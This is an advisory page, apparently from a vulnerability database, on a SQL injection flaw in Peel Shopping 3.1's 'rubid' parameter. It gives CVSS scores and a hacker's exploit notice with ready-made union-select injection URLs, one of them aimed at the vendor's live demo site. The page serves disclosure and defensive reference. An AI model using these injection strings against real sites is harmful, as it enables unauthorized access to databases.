Peel Shopping 3.1 (index.php rubid) SQL Injection Vulnerability

2009-08-04 / 2009-08-05
Credit: SuB-ZeRo
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-6892
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############### SuB-ZeRo ############### ############### Dz-hackers ################# PEEL Remote SQL Injection Vulnerability ----------------------------------------------------------------------------------------------------------- [+]Discovred by : SuB-ZeRo [+]Vendor URL : http://www.peel.fr/ [+]downloader : http://www.script-masters.com/home/voir_script_php_mysql-146.html [+]home: www.sub-z3ro.com / www.h4ck3r-dz.com [+]ConTacTe: FbH@hotmail.com [+]DoRk: FiNd It (SoOrY) [+]exploit: [+]http://[website]/[script]/lire/index.php?rubid=1+union+select+1,@@version,3-- [+]http://[website]/[script]/index.php?rubid=1+union+select+1,@@version,3-- [+]l!ve demo: [+]http://demo.peel.fr/lire/index.php?rubid=1+union+select+1,@@version,3-- ---------------------------------------------------------------------------------------------------------------------- [+]grettz : for my best frinde x.CJP.x / sousn / bbbbbbbb / and all mouslims and eid sa3id for all arabs and mouslimme ---------------------------------------------------------------------------------------------------------------------- SooN sub-z3ro.com

References:

http://www.milw0rm.com/exploits/7395
http://secunia.com/advisories/33073
http://osvdb.org/50604


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top